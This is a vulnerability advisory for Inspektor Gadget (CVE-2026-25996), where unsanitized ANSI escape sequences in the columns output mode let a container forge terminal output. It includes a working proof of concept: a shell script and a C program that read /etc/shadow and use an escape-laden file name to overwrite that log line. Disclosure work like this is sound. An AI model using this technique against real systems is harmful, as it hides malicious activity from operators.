GHSA-34R5-6J7W-235F

Vulnerability from github – Published: 2026-04-22 18:50 – Updated: 2026-04-22 18:50
VLAI?
Summary
Inspektor Gadget uses unsanitized ANSI Escape Sequences In `columns` Output Mode
Details

Description

String fields from eBPF events in columns output mode are rendered to the terminal without any sanitization of control characters or ANSI escape sequences.

Therefore, a maliciously forged – partially or completely – event payload, coming from an observed container, might inject the escape sequences into the terminal of ig operators, with various effects.

The columns output mode is the default when running ig run interactively.

PoC

Attachments

run.sh


#!/bin/bash
set -e

SCRIPT_DIR="$(cd "$(dirname "$0")" && pwd)"
CONTAINER_NAME="poc-escape-inject"

echo "Make sure ig is running in another terminal:"
echo "  sudo ig run trace_open -c ${CONTAINER_NAME}"
echo ""
echo "Press Enter to continue..."
read -r

sudo docker run --rm \
    --name "${CONTAINER_NAME}" \
    -v "${SCRIPT_DIR}/escape_inject.c:/src/escape_inject.c:ro" \
    gcc:latest \
    bash -c "
        gcc -o /tmp/escape_inject /src/escape_inject.c && \
        /tmp/escape_inject
    "

escape_inject.c

#include <fcntl.h>
#include <stdio.h>
#include <unistd.h>

static void read_file(const char *path)
{
    int fd = open(path, O_RDONLY);
    if (fd >= 0)
        close(fd);
}

static void create_file(const char *path)
{
    int fd = open(path, O_CREAT | O_WRONLY | O_TRUNC, 0644);
    if (fd >= 0)
        close(fd);
}

int main(void)
{
    printf("[1] normal activity\n");
    create_file("/tmp/app.log");
    printf("[2] malicious read of /etc/shadow\n");
    read_file("/etc/shadow");
    usleep(300000);
    printf("[3] tampering the log\n");
    create_file("/etc\x1b[1A/bashrc\x1b[1B\x1b[13C");
    usleep(300000);
    return 0;
}
  1. Setup a Linux host and build/install ig version 0.48.0
  2. Run the attached run.sh on a terminal
  3. Run sudo ig run trace_open -c poc-escape-inject on another terminal
  4. Press "Enter" on the terminal attached to run.sh
  5. Observe the events traced by ig
  6. Notice that, at some point, the line where /etc/shadow is logged is overwritten /etc/bashrc, demonstrating the log injection

Impact

The impact depends on the injection point – mostly due to length limitations – and on the terminal used by the operator when running displaying columns output.

At the very least, the injection can be used for Log Injection, by inserting new lines or deleting existing ones.

However, by leveraging Operating System Command (OSC) ANSI escape sequences, the impact on modern terminal can vary, possibly allowing an attacker to:

  • lead to DoS (Denial of Service)
  • write to the system clipboard
  • create hyperlinks to attacker-controlled servers
  • change window title
  • potentially execute code (see referenced resources)

Resources

  • https://www.youtube.com/watch?v=spb8Gk9Z09Y

Notes

The json output mode was already sanitizing the content.

Severity ?
6.9 (Medium)
CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N
Show details on source website
To clipboard 

{
  "affected": [
    {
      "package": {
        "ecosystem": "Go",
        "name": "github.com/inspektor-gadget/inspektor-gadget"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "0.49.1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2026-25996"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-150"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2026-04-22T18:50:32Z",
    "nvd_published_at": "2026-02-12T21:16:02Z",
    "severity": "MODERATE"
  },
  "details": "### Description\nString fields from eBPF events in `columns` output mode are rendered to the terminal without any sanitization of control characters or ANSI escape sequences. \n\nTherefore, a maliciously forged \u2013\u00a0partially or completely \u2013 event payload, coming from an observed container, might inject the escape sequences into the terminal of `ig` operators, with various effects.\n\nThe `columns` output mode is the default when running `ig run` interactively.\n\n### PoC\n\n#### Attachments\nrun.sh\n```bash\n\n#!/bin/bash\nset -e\n\nSCRIPT_DIR=\"$(cd \"$(dirname \"$0\")\" \u0026\u0026 pwd)\"\nCONTAINER_NAME=\"poc-escape-inject\"\n\necho \"Make sure ig is running in another terminal:\"\necho \"  sudo ig run trace_open -c ${CONTAINER_NAME}\"\necho \"\"\necho \"Press Enter to continue...\"\nread -r\n\nsudo docker run --rm \\\n    --name \"${CONTAINER_NAME}\" \\\n    -v \"${SCRIPT_DIR}/escape_inject.c:/src/escape_inject.c:ro\" \\\n    gcc:latest \\\n    bash -c \"\n        gcc -o /tmp/escape_inject /src/escape_inject.c \u0026\u0026 \\\n        /tmp/escape_inject\n    \"\n```\n\nescape_inject.c\n```c\n#include \u003cfcntl.h\u003e\n#include \u003cstdio.h\u003e\n#include \u003cunistd.h\u003e\n\nstatic void read_file(const char *path)\n{\n\tint fd = open(path, O_RDONLY);\n\tif (fd \u003e= 0)\n\t\tclose(fd);\n}\n\nstatic void create_file(const char *path)\n{\n\tint fd = open(path, O_CREAT | O_WRONLY | O_TRUNC, 0644);\n\tif (fd \u003e= 0)\n\t\tclose(fd);\n}\n\nint main(void)\n{\n\tprintf(\"[1] normal activity\\n\");\n\tcreate_file(\"/tmp/app.log\");\n\tprintf(\"[2] malicious read of /etc/shadow\\n\");\n\tread_file(\"/etc/shadow\");\n\tusleep(300000);\n\tprintf(\"[3] tampering the log\\n\");\n\tcreate_file(\"/etc\\x1b[1A/bashrc\\x1b[1B\\x1b[13C\");\n\tusleep(300000);\n\treturn 0;\n}\n```\n\n1. Setup a Linux host and build/install `ig` version `0.48.0`\n2. Run the attached `run.sh` on a terminal\n3. Run `sudo ig run trace_open -c poc-escape-inject` on another terminal\n4. Press \"Enter\" on the terminal attached to `run.sh`\n5. Observe the events traced by `ig`\n6. Notice that, at some point, the line where `/etc/shadow` is logged is overwritten `/etc/bashrc`, demonstrating the log injection\n\n\n### Impact\n\nThe impact depends on the injection point \u2013 mostly due to length limitations \u2013 and on the terminal used by the operator when running displaying `columns` output.\n\nAt the very least, the injection can be used for [Log Injection](https://owasp.org/www-community/attacks/Log_Injection), by inserting new lines or deleting existing ones.\n\nHowever, by leveraging Operating System Command (OSC) ANSI escape sequences, the impact on modern terminal can vary, possibly allowing an attacker to:\n\n- lead to DoS (Denial of Service)\n- write to the system clipboard\n- create hyperlinks to attacker-controlled servers\n- change window title\n- potentially execute code (see referenced resources)\n\n### Resources\n- https://www.youtube.com/watch?v=spb8Gk9Z09Y\n\n### Notes\n\nThe `json` output mode was already sanitizing the content.",
  "id": "GHSA-34r5-6j7w-235f",
  "modified": "2026-04-22T18:50:32Z",
  "published": "2026-04-22T18:50:32Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/inspektor-gadget/inspektor-gadget/security/advisories/GHSA-34r5-6j7w-235f"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-25996"
    },
    {
      "type": "WEB",
      "url": "https://github.com/inspektor-gadget/inspektor-gadget/commit/d59cf72971f9b7110d9c179dc8ae8b7a11dbd6d2"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/inspektor-gadget/inspektor-gadget"
    },
    {
      "type": "WEB",
      "url": "https://github.com/inspektor-gadget/inspektor-gadget/releases/tag/v0.49.1"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N",
      "type": "CVSS_V4"
    }
  ],
  "summary": "Inspektor Gadget uses unsanitized ANSI Escape Sequences In `columns` Output Mode"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.




Sightings

Author Source Type Date

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.



Detection rules are retrieved from Rulezet.